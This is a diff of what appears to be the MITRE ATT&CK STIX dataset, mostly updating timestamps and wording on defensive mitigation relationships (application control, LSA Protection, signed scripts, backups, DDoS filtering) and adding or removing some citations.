- "modified": "2020-03-25T16:14:29.458Z",
+ "modified": "2020-06-30T21:23:15.609Z",
"created": "2020-01-24T17:42:23.786Z"
},
{
@@ -158290,7 +159662,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-25T16:14:29.497Z",
+ "modified": "2020-06-30T21:23:15.633Z",
"created": "2020-01-24T17:42:23.790Z"
},
{
@@ -158304,7 +159676,7 @@
"description": "Limit access to the root account and prevent users from loading kernel modules and extensions through proper privilege separation and limiting Privilege Escalation opportunities.",
"id": "relationship--4907e8fb-e224-49a6-aa94-5a76afa714ba",
"type": "relationship",
- "modified": "2020-03-25T16:14:29.500Z",
+ "modified": "2020-06-30T21:23:15.655Z",
"created": "2020-01-24T17:42:23.791Z"
},
{
@@ -158415,27 +159787,6 @@
"modified": "2020-03-25T16:52:26.824Z",
"created": "2020-01-24T18:38:56.145Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312",
- "target_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4",
- "relationship_type": "mitigates",
- "description": "On Windows 8.1 and Server 2012 R2, enable LSA Protection by setting the Registry key HKEY_LOCAL_MACHINE\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\RunAsPPL to dword:00000001. (Citation: Microsoft LSA Protection Mar 2014) LSA Protection ensures that LSA plug-ins and drivers are only loaded if they are digitally signed with a Microsoft signature and adhere to the Microsoft Security Development Lifecycle (SDL) process guidance.",
- "id": "relationship--9d6222a8-a7fd-47fc-af9f-07349128eec4",
- "external_references": [
- {
- "url": "https://technet.microsoft.com/library/dn408187.aspx",
- "description": "Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.",
- "source_name": "Microsoft LSA Protection Mar 2014"
- }
- ],
- "type": "relationship",
- "modified": "2020-03-25T16:52:26.852Z",
- "created": "2020-01-24T18:38:56.148Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -158572,7 +159923,7 @@
"description": "Prevent plist files from being modified by users by making them read-only.",
"id": "relationship--1ff2882e-64b3-43b1-a29a-c566c90bc24d",
"type": "relationship",
- "modified": "2020-03-25T19:47:39.141Z",
+ "modified": "2020-06-20T19:57:36.305Z",
"created": "2020-01-24T20:02:59.495Z"
},
{
@@ -158588,27 +159939,6 @@
"modified": "2020-01-24T20:02:59.498Z",
"created": "2020-01-24T20:02:59.498Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--049cef3b-22d5-4be6-b50c-9839c7a34fdd",
- "target_ref": "malware--c19cfc89-5ac6-4d2d-a236-70d2b32e007c",
- "external_references": [
- {
- "description": "E. Xu, G. Guo. (2019, June 28). Mobile Cyberespionage Campaign \u2018Bouncing Golf\u2019 Affects Middle East. Retrieved January 27, 2020.",
- "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/mobile-cyberespionage-campaign-bouncing-golf-affects-middle-east/",
- "source_name": "Trend Micro Bouncing Golf 2019"
- }
- ],
- "description": "(Citation: Trend Micro Bouncing Golf 2019)",
- "relationship_type": "uses",
- "id": "relationship--7850d933-120b-4ae6-998d-8dc4dfd6d164",
- "type": "relationship",
- "modified": "2020-01-27T17:49:05.664Z",
- "created": "2020-01-27T17:49:05.664Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -158950,7 +160280,7 @@
"description": "Remove users from the local administrator group on systems.",
"id": "relationship--922037af-61f0-42d8-8b57-310b6b56ea5a",
"type": "relationship",
- "modified": "2020-03-27T12:11:48.883Z",
+ "modified": "2020-06-25T19:57:54.875Z",
"created": "2020-01-30T14:24:35.581Z"
},
{
@@ -158964,7 +160294,7 @@
"description": "Although UAC bypass techniques exist, it is still prudent to use the highest enforcement level for UAC when possible and mitigate bypass opportunities that exist with techniques such as [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).",
"id": "relationship--86eb3c0d-b1c1-4b52-b802-18f321450f29",
"type": "relationship",
- "modified": "2020-03-27T12:11:48.885Z",
+ "modified": "2020-06-25T19:57:54.870Z",
"created": "2020-01-30T14:24:35.595Z"
},
{
@@ -158985,7 +160315,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-27T12:11:48.909Z",
+ "modified": "2020-06-25T19:57:54.893Z",
"created": "2020-01-30T14:24:35.600Z"
},
{
@@ -159702,10 +161032,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58",
"relationship_type": "mitigates",
- "description": "Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application whitelisting configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.",
+ "description": "Certain signed scripts that can be used to execute other programs may not be necessary within a given environment. Use application control configured to block execution of these scripts if they are not required for a given system or network to prevent potential misuse by adversaries.",
"id": "relationship--387cdc83-fc81-499e-8875-e3d4789af9c3",
"type": "relationship",
- "modified": "2020-03-29T19:39:37.313Z",
+ "modified": "2020-06-20T20:11:42.829Z",
"created": "2020-02-03T16:49:58.298Z"
},
{
@@ -160339,7 +161669,7 @@
"description": "System settings can prevent applications from running that haven't been downloaded through the Apple Store which can help mitigate some of these issues. ",
"id": "relationship--819bc603-b0fe-4681-a235-3c6e9a36e3b5",
"type": "relationship",
- "modified": "2020-03-31T13:12:49.644Z",
+ "modified": "2020-06-20T22:41:20.206Z",
"created": "2020-02-05T16:16:08.599Z"
},
{
@@ -160405,7 +161735,7 @@
"description": "Ensure proper permissions are set for Registry hives to prevent users from modifying keys related to SIP and trust provider components. Components may still be able to be hijacked to suitable functions already present on disk if malicious modifications to Registry keys are not prevented. ",
"id": "relationship--90ad45d7-1980-4909-97f2-3c5a10a47deb",
"type": "relationship",
- "modified": "2020-03-27T13:19:38.782Z",
+ "modified": "2020-06-20T22:42:26.181Z",
"created": "2020-02-05T19:34:05.063Z"
},
{
@@ -160419,7 +161749,7 @@
"description": "Restrict storage and execution of SIP DLLs to protected directories, such as C:\\\\Windows, rather than user directories.",
"id": "relationship--ee2fcc2b-735d-4948-b25a-401f60fe7412",
"type": "relationship",
- "modified": "2020-03-27T13:19:38.789Z",
+ "modified": "2020-06-20T22:42:26.188Z",
"created": "2020-02-05T19:34:05.077Z"
},
{
@@ -160430,10 +161760,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--543fceb5-cb92-40cb-aacf-6913d4db58bc",
"relationship_type": "mitigates",
- "description": "Enable whitelisting solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs.",
+ "description": "Enable application control solutions such as AppLocker and/or Device Guard to block the loading of malicious SIP DLLs.",
"id": "relationship--08dd36a7-dee0-4f25-b3dc-d030c32151f5",
"type": "relationship",
- "modified": "2020-03-27T13:19:38.797Z",
+ "modified": "2020-06-20T22:42:26.196Z",
"created": "2020-02-05T19:34:05.079Z"
},
{
@@ -160618,7 +161948,7 @@
"description": "Require signed binaries.",
"id": "relationship--3c37c043-7f27-4fb9-ba7f-bce3181849ac",
"type": "relationship",
- "modified": "2020-03-29T20:23:01.102Z",
+ "modified": "2020-06-20T22:11:46.117Z",
"created": "2020-02-10T20:43:10.389Z"
},
{
@@ -160629,10 +161959,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"relationship_type": "mitigates",
- "description": "Use tools that restrict program execution via whitelisting by attributes other than file name for common operating system utilities that are needed.",
+ "description": "Use tools that restrict program execution via application control by attributes other than file name for common operating system utilities that are needed.",
"id": "relationship--095e5f7b-288c-4995-8045-b691602d38c9",
"type": "relationship",
- "modified": "2020-03-29T20:23:01.105Z",
+ "modified": "2020-06-20T22:11:46.134Z",
"created": "2020-02-10T20:43:10.395Z"
},
{
@@ -160646,7 +161976,7 @@
"description": "Use file system access controls to protect folders such as C:\\Windows\\System32.",
"id": "relationship--026e7bb0-2037-4bfc-b9ae-98e70530f22a",
"type": "relationship",
- "modified": "2020-03-29T20:23:01.118Z",
+ "modified": "2020-06-20T22:11:46.136Z",
"created": "2020-02-10T20:43:10.408Z"
},
{
@@ -161278,7 +162608,7 @@
}
],
"type": "relationship",
- "modified": "2020-02-25T19:23:34.479Z",
+ "modified": "2020-05-20T13:33:51.054Z",
"created": "2020-02-12T14:37:27.500Z"
},
{
@@ -161859,7 +163189,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T12:53:56.514Z",
+ "modified": "2020-06-17T14:25:38.393Z",
"created": "2020-02-17T21:26:44.446Z"
},
{
@@ -162114,33 +163444,33 @@
"id": "relationship--2ebbb8a5-a5f2-495d-bdf3-c49701edb26b",
"external_references": [
{
- "source_name": "Microsoft Trust Considerations Nov 2014",
+ "url": "https://technet.microsoft.com/library/cc755321.aspx",
"description": "Microsoft. (2014, November 19). Security Considerations for Trusts. Retrieved November 30, 2017.",
- "url": "https://technet.microsoft.com/library/cc755321.aspx"
+ "source_name": "Microsoft Trust Considerations Nov 2014"
},
{
- "source_name": "Microsoft SID Filtering Quarantining Jan 2009",
+ "url": "https://technet.microsoft.com/library/cc794757.aspx",
"description": "Microsoft. (n.d.). Configuring SID Filter Quarantining on External Trusts. Retrieved November 30, 2017.",
- "url": "https://technet.microsoft.com/library/cc794757.aspx"
+ "source_name": "Microsoft SID Filtering Quarantining Jan 2009"
},
{
- "source_name": "Microsoft Netdom Trust Sept 2012",
+ "url": "https://technet.microsoft.com/library/cc835085.aspx",
"description": "Microsoft. (2012, September 11). Command-Line Reference - Netdom Trust. Retrieved November 30, 2017.",
- "url": "https://technet.microsoft.com/library/cc835085.aspx"
+ "source_name": "Microsoft Netdom Trust Sept 2012"
},
{
- "source_name": "Microsoft Netdom Trust Sept 2012",
+ "url": "https://technet.microsoft.com/library/cc835085.aspx",
"description": "Microsoft. (2012, September 11). Command-Line Reference - Netdom Trust. Retrieved November 30, 2017.",
- "url": "https://technet.microsoft.com/library/cc835085.aspx"
+ "source_name": "Microsoft Netdom Trust Sept 2012"
},
{
- "source_name": "AdSecurity Kerberos GT Aug 2015",
+ "url": "https://adsecurity.org/?p=1640",
"description": "Metcalf, S. (2015, August 7). Kerberos Golden Tickets are Now More Golden. Retrieved December 1, 2017.",
- "url": "https://adsecurity.org/?p=1640"
+ "source_name": "AdSecurity Kerberos GT Aug 2015"
}
],
"type": "relationship",
- "modified": "2020-03-31T13:06:23.725Z",
+ "modified": "2020-05-29T16:34:40.559Z",
"created": "2020-02-18T18:34:49.716Z"
},
{
@@ -162336,7 +163666,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:46:23.838Z",
+ "modified": "2020-05-29T15:17:30.753Z",
"created": "2020-02-19T20:36:33.642Z"
},
{
@@ -162403,8 +163733,16 @@
"target_ref": "attack-pattern--0cfe31a7-81fc-472c-bc45-e2808d1066a3",
"relationship_type": "mitigates",
"id": "relationship--f2fd105e-f481-486a-97b6-d5ef3324a787",
+ "external_references": [
+ {
+ "source_name": "Ready.gov IT DRP",
+ "url": "https://www.ready.gov/business/implementation/IT",
+ "description": "Ready.gov. (n.d.). IT Disaster Recovery Plan. Retrieved March 15, 2019."
+ }
+ ],
+ "description": "Consider implementing IT disaster recovery plans that contain procedures for taking regular data backups that can be used to restore organizational data.(Citation: Ready.gov IT DRP) Ensure backups are stored off system and is protected from common methods adversaries may use to gain access and destroy the backups to prevent recovery.",
"type": "relationship",
- "modified": "2020-03-28T22:35:27.807Z",
+ "modified": "2020-04-22T15:19:31.565Z",
"created": "2020-02-20T14:34:08.725Z"
},
{
@@ -162417,7 +163755,7 @@
"relationship_type": "mitigates",
"id": "relationship--f57b2244-f4f6-4eb4-ac07-f14f8cb0518b",
"type": "relationship",
- "modified": "2020-03-28T22:35:27.816Z",
+ "modified": "2020-04-22T15:19:31.609Z",
"created": "2020-02-20T14:34:08.733Z"
},
{
@@ -162705,7 +164043,7 @@
"description": "Use multi-factor authentication. Where possible, also enable multi-factor authentication on externally facing services.",
"id": "relationship--dc1b1842-ce36-46ec-83d5-66292d65c463",
"type": "relationship",
- "modified": "2020-03-24T20:01:57.032Z",
+ "modified": "2020-07-09T17:01:18.218Z",
"created": "2020-02-20T17:14:40.155Z"
},
{
@@ -162726,7 +164064,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:01:57.044Z",
+ "modified": "2020-07-09T17:01:18.187Z",
"created": "2020-02-20T17:14:40.157Z"
},
{
@@ -162838,7 +164176,7 @@
"description": "Limit credential overlap across accounts and systems by training users and administrators not to use the same password for multiple accounts.",
"id": "relationship--b6583fd8-89f7-4494-8690-3456391bf193",
"type": "relationship",
- "modified": "2020-03-24T20:34:26.312Z",
+ "modified": "2020-06-09T20:46:00.630Z",
"created": "2020-02-20T18:39:33.161Z"
},
{
@@ -162864,7 +164202,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:34:26.340Z",
+ "modified": "2020-06-09T20:46:00.658Z",
"created": "2020-02-20T18:39:33.164Z"
},
{
@@ -162885,7 +164223,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-24T20:34:26.335Z",
+ "modified": "2020-06-09T20:46:00.675Z",
"created": "2020-02-20T18:39:33.165Z"
},
{
@@ -162899,7 +164237,7 @@
"description": "Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers.",
"id": "relationship--aa2cd10c-5062-4abb-a8ec-0e178a5440ec",
"type": "relationship",
- "modified": "2020-03-24T20:34:26.360Z",
+ "modified": "2020-06-09T20:46:00.702Z",
"created": "2020-02-20T18:39:33.167Z"
},
{
@@ -162913,7 +164251,7 @@
"description": "Ensure that local administrator accounts have complex, unique passwords across all systems on the network.",
"id": "relationship--f9ed8046-c00b-4d8a-a8d2-833f45f1dfcb",
"type": "relationship",
- "modified": "2020-03-24T20:34:26.374Z",
+ "modified": "2020-06-09T20:46:00.701Z",
"created": "2020-02-20T18:39:33.170Z"
},
{
@@ -162924,17 +164262,22 @@
"source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
"target_ref": "attack-pattern--65f2d882-3f41-4d48-8a06-29af77ec9f90",
"relationship_type": "mitigates",
- "description": "Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012)",
+ "description": "Consider disabling or restricting NTLM.(Citation: Microsoft Disable NTLM Nov 2012) Consider disabling WDigest authentication.(Citation: Microsoft WDigest Mit)",
"id": "relationship--516e746b-6208-41db-8ea8-4e3fa42f5053",
"external_references": [
{
"url": "https://technet.microsoft.com/library/jj865668.aspx",
"description": "Microsoft. (2012, November 29). Using security policies to restrict NTLM traffic. Retrieved December 4, 2017.",
"source_name": "Microsoft Disable NTLM Nov 2012"
+ },
+ {
+ "source_name": "Microsoft WDigest Mit",
+ "url": "https://support.microsoft.com/en-us/help/2871997/microsoft-security-advisory-update-to-improve-credentials-protection-a",
+ "description": "Microsoft. (2014, May 13). Microsoft Security Advisory: Update to improve credentials protection and management. Retrieved June 8, 2020."
}
],
"type": "relationship",
- "modified": "2020-03-24T20:34:26.377Z",
+ "modified": "2020-06-09T20:46:00.716Z",
"created": "2020-02-20T18:39:33.171Z"
},
{
@@ -163450,7 +164793,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--f8b6eae9-cf2b-4b16-8c44-03d989533dd6",
"type": "relationship",
- "modified": "2020-02-21T22:32:09.182Z",
+ "modified": "2020-06-20T22:17:59.283Z",
"created": "2020-02-21T18:52:23.547Z"
},
{
@@ -163464,7 +164807,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--0e530e67-4e80-412f-8b38-fbc14085f05c",
"type": "relationship",
- "modified": "2020-02-21T22:34:27.105Z",
+ "modified": "2020-06-20T22:19:58.942Z",
"created": "2020-02-21T18:55:42.923Z"
},
{
@@ -163478,7 +164821,7 @@
"description": "Ensure proper process and file permissions are in place to prevent adversaries from disabling or interfering with security/logging services.",
"id": "relationship--b8113c99-fc84-4c2d-8925-cb1f5733f6eb",
"type": "relationship",
- "modified": "2020-03-29T21:49:59.831Z",
+ "modified": "2020-06-25T15:47:30.064Z",
"created": "2020-02-21T20:22:13.647Z"
},
{
@@ -163492,7 +164835,7 @@
"description": "Ensure proper user permissions are in place to prevent adversaries from disabling or interfering with security/logging services.",
"id": "relationship--7ef8afb4-2bfa-471b-a412-b1862418be3e",
"type": "relationship",
- "modified": "2020-03-29T21:49:59.853Z",
+ "modified": "2020-06-25T15:47:30.036Z",
"created": "2020-02-21T20:22:13.651Z"
},
{
@@ -163601,7 +164944,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--25fc21a1-4965-4c18-9415-215390eab16c",
"type": "relationship",
- "modified": "2020-03-26T21:00:39.569Z",
+ "modified": "2020-06-20T22:28:08.872Z",
"created": "2020-02-21T20:46:51.944Z"
},
{
@@ -163612,10 +164955,10 @@
"source_ref": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3",
"target_ref": "attack-pattern--8f504411-cb96-4dac-a537-8d2bb7679c59",
"relationship_type": "mitigates",
- "description": "Make sure that the HISTCONTROL environment variable is set to \u201cignoredup\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.",
+ "description": "Make sure that the HISTCONTROL environment variable is set to \u201cignoredups\u201d instead of \u201cignoreboth\u201d or \u201cignorespace\u201d.",
"id": "relationship--35928199-0073-4000-b2f8-726ab2d41a06",
"type": "relationship",
- "modified": "2020-03-29T22:09:18.184Z",
+ "modified": "2020-06-19T16:50:46.018Z",
"created": "2020-02-21T20:56:06.721Z"
},
{
@@ -163876,7 +165219,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--5611881f-a9a3-4527-99a6-e717630703bb",
"type": "relationship",
- "modified": "2020-02-21T22:40:58.262Z",
+ "modified": "2020-06-20T22:21:32.628Z",
"created": "2020-02-21T21:35:25.887Z"
},
{
@@ -163890,7 +165233,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--1016e15c-64ed-4338-9ca9-83ffae3beb82",
"type": "relationship",
- "modified": "2020-03-23T13:20:56.030Z",
+ "modified": "2020-06-20T22:17:05.561Z",
"created": "2020-02-21T21:42:07.090Z"
},
{
@@ -163904,7 +165247,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--ee720f16-feda-4146-891e-fb814f912280",
"type": "relationship",
- "modified": "2020-02-21T22:41:25.311Z",
+ "modified": "2020-06-20T22:23:35.908Z",
"created": "2020-02-21T21:46:05.325Z"
},
{
@@ -163918,7 +165261,7 @@
"description": "Utilize Yama (ex: /proc/sys/kernel/yama/ptrace_scope) to mitigate ptrace based process injection by restricting the use of ptrace to privileged users only. Other mitigation controls involve the deployment of security kernel modules that provide advanced access control and process restrictions such as SELinux, grsecurity, and AppArmor. ",
"id": "relationship--c7676864-765f-4c08-951e-fb14f35f16c1",
"type": "relationship",
- "modified": "2020-03-26T20:27:57.416Z",
+ "modified": "2020-06-20T22:24:56.934Z",
"created": "2020-02-21T22:07:25.435Z"
},
{
@@ -163932,7 +165275,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--b33fd646-b98b-4ea0-8ae3-5cf0367140f6",
"type": "relationship",
- "modified": "2020-03-26T20:27:57.419Z",
+ "modified": "2020-06-20T22:24:56.936Z",
"created": "2020-02-21T22:07:25.444Z"
},
{
@@ -163946,7 +165289,7 @@
"description": "Restrict the permissions on sensitive files such as /proc/[pid]/maps or /proc/[pid]/mem. ",
"id": "relationship--49d40f3b-33b4-424c-a645-82d2a84e5c28",
"type": "relationship",
- "modified": "2020-03-26T20:33:52.704Z",
+ "modified": "2020-06-20T22:25:55.462Z",
"created": "2020-02-21T22:16:10.099Z"
},
{
@@ -163960,7 +165303,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--1f4fe996-b32f-4cc5-b5d6-dc10a9bebeeb",
"type": "relationship",
- "modified": "2020-03-26T20:33:52.713Z",
+ "modified": "2020-06-20T22:25:55.465Z",
"created": "2020-02-21T22:16:10.110Z"
},
{
@@ -163974,7 +165317,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--8dfddd1a-dd5f-461f-86ce-ba1fd557a397",
"type": "relationship",
- "modified": "2020-03-26T20:38:26.483Z",
+ "modified": "2020-06-20T22:26:33.386Z",
"created": "2020-02-21T22:21:10.156Z"
},
{
@@ -163988,7 +165331,7 @@
"description": "Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. ",
"id": "relationship--505e8568-1870-4aca-81ff-7c222eb4db37",
"type": "relationship",
- "modified": "2020-03-26T21:05:43.097Z",
+ "modified": "2020-06-20T22:27:21.422Z",
"created": "2020-02-21T22:25:12.496Z"
},
{
@@ -164033,7 +165376,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-31T13:54:08.493Z",
+ "modified": "2020-06-01T13:16:33.246Z",
"created": "2020-02-25T17:17:48.379Z"
},
{
@@ -164247,7 +165590,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T23:24:39.529Z",
+ "modified": "2020-05-20T13:33:51.038Z",
"created": "2020-02-25T19:19:09.960Z"
},
{
@@ -165079,6 +166422,16 @@
"description": "When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)\n\nDepending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)\n\nAs immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)",
"id": "relationship--92f524c5-86e8-43cf-90d5-907ac16acf5d",
"external_references": [
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
{
"source_name": "CERT-EU DDoS March 2017",
"url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
@@ -165086,7 +166439,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-29T01:10:52.515Z",
+ "modified": "2020-06-01T13:16:33.127Z",
"created": "2020-03-02T20:36:52.656Z"
},
{
@@ -165100,6 +166453,16 @@
"description": "When flood volumes exceed the capacity of the network connection being targeted, it is typically necessary to intercept the incoming traffic upstream to filter out the attack traffic from the legitimate traffic. Such defenses can be provided by the hosting Internet Service Provider (ISP) or by a 3rd party such as a Content Delivery Network (CDN) or providers specializing in DoS mitigations.(Citation: CERT-EU DDoS March 2017)\n\nDepending on flood volume, on-premises filtering may be possible by blocking source addresses sourcing the attack, blocking ports that are being targeted, or blocking protocols being used for transport.(Citation: CERT-EU DDoS March 2017)\n\nAs immediate response may require rapid engagement of 3rd parties, analyze the risk associated to critical resources being affected by Network DoS attacks and create a disaster recovery plan/business continuity plan to respond to incidents.(Citation: CERT-EU DDoS March 2017)",
"id": "relationship--2f47b6cb-a378-492d-9565-e9ebbca68908",
"external_references": [
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
+ {
+ "source_name": "CERT-EU DDoS March 2017",
+ "url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
+ "description": "Meintanis, S., Revuelto, V., Socha, K.. (2017, March 10). DDoS Overview and Response Guide. Retrieved April 24, 2019."
+ },
{
"source_name": "CERT-EU DDoS March 2017",
"url": "http://cert.europa.eu/static/WhitePapers/CERT-EU_Security_Whitepaper_DDoS_17-003.pdf",
@@ -165107,7 +166470,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-23T12:55:30.265Z",
+ "modified": "2020-06-01T13:16:33.146Z",
"created": "2020-03-02T21:04:24.530Z"
},
{
@@ -165509,7 +166872,7 @@
"description": "Where possible, only permit execution of signed scripts.",
"id": "relationship--2cf7243f-d5d7-473b-9cb7-27c7186565d3",
"type": "relationship",
- "modified": "2020-03-28T16:19:45.892Z",
+ "modified": "2020-06-25T03:19:34.259Z",
"created": "2020-03-09T13:41:14.474Z"
},
{
@@ -165530,7 +166893,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T16:19:45.932Z",
+ "modified": "2020-06-25T03:19:34.303Z",
"created": "2020-03-09T13:41:14.487Z"
},
{
@@ -165544,7 +166907,7 @@
"description": "Disable or remove any unnecessary or unused shells or interpreters.",
"id": "relationship--6abc6901-d152-4b5f-b27d-8b973ae567cb",
"type": "relationship",
- "modified": "2020-03-28T16:19:45.936Z",
+ "modified": "2020-06-25T03:19:34.300Z",
"created": "2020-03-09T13:41:14.499Z"
},
{
@@ -165558,7 +166921,7 @@
"description": "Set PowerShell execution policy to execute only signed scripts.",
"id": "relationship--8fc79376-2f71-4ca1-8177-a96dea11f8c7",
"type": "relationship",
- "modified": "2020-03-28T16:26:31.111Z",
+ "modified": "2020-06-24T13:51:22.595Z",
"created": "2020-03-09T13:48:55.768Z"
},
{
@@ -165579,7 +166942,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T16:26:31.140Z",
+ "modified": "2020-06-24T13:51:22.627Z",
"created": "2020-03-09T13:48:55.799Z"
},
{
@@ -165593,7 +166956,7 @@
"description": "It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions.\n\nDisable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.",
"id": "relationship--5a580cd0-19f1-41d6-865b-786a41081a7e",
"type": "relationship",
- "modified": "2020-03-28T16:26:31.137Z",
+ "modified": "2020-06-24T13:51:22.624Z",
"created": "2020-03-09T13:48:55.802Z"
},
{
@@ -165630,10 +166993,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--37b11151-1776-4f8f-b328-30939fbf2ceb",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--809f6537-c7f8-4d96-ba16-5bffa897b52f",
"type": "relationship",
- "modified": "2020-03-28T16:44:34.721Z",
+ "modified": "2020-06-20T20:11:42.524Z",
"created": "2020-03-09T14:07:54.876Z"
},
{
@@ -165654,7 +167017,7 @@
}
],
"type": "relationship",
- "modified": "2020-03-28T16:44:34.723Z",
+ "modified": "2020-04-14T13:28:17.854Z",
"created": "2020-03-09T14:07:54.886Z"
},
{
@@ -165691,10 +167054,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--aa103bc8-1753-4b41-bf5c-a9dc0b9a2986",
"type": "relationship",
- "modified": "2020-03-28T17:02:13.822Z",
+ "modified": "2020-06-20T20:11:42.865Z",
"created": "2020-03-09T14:12:31.537Z"
},
{
@@ -165718,10 +167081,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
"target_ref": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
"relationship_type": "mitigates",
- "description": "Use application whitelisting where appropriate.",
+ "description": "Use application control where appropriate.",
"id": "relationship--6f5aaa40-a294-4b8f-8bd3-0f34ce8a0612",
"type": "relationship",
- "modified": "2020-03-28T17:06:19.793Z",
+ "modified": "2020-06-20T20:11:42.897Z",
"created": "2020-03-09T14:15:05.744Z"
},
{
@@ -165745,10 +167108,10 @@
"source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db",
